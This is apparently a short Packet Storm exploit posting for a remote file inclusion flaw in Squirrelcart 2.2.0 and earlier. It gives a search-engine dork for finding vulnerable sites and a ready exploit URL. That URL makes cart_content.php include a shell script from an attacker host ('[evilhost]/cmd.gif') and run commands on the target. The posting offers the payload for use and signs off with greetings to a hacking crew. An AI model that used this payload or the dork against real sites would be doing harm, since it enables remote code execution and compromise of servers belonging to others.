Squirrelcart versions 2.2.0 and below suffer from a remote file inclusion vulnerability.
8721a30af3435fc7a848a6b4dd09d748c70ca04d671f8fd033779791d626f305-------------------------------------------------------------------------
$ Title : Squirrelcart 2.2.0 <= Remote File Inclusion Vulnerability $
$-----------------------------------------------------------------------$
$ URL : http://www.ldev.com/ $
$-----------------------------------------------------------------------$
$ Dork : inurl:/squirrelcart/ or powered by Squirrelcart $
$-----------------------------------------------------------------------$
$ Author: OLiBekaS $
$-----------------------------------------------------------------------$
$ mail : olibekas[at]gmail.com $
$-----------------------------------------------------------------------$
Greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
Exploit:
http://[target]/[Squirrelcart_path]/cart_content.php?cart_isp_root=http://[evilhost]/cmd.gif?cmd=ls
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed